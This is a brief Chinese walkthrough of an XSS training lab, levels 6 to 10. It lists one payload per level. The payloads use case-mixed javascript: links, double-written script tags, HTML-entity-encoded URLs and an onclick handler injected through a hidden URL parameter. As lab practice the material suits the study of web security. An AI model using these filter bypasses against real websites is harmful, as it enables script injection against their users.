第六关

使用a标签，发现a标签可以。

 "><a hreF=javascript:alert('aa')>aa</a>

点击aa

 

第七关

使用双写绕过

1"><ScscriptRipt>alert(1)</ScscriptRipt>

 

 

第八关 

将javascript:alert(1)进行编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

然后将编码输入再次点击链接

 第九关 

将javascript:alert(1)进行编码后

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

后面再加上//http://

点击有链接

 

第10关 

没有输入的地方，就在URL中，尝试将隐藏标签显示出来

攻击代码&t_sort=111" onclick=javascript:alert() type="text"

点击一下输入框，完成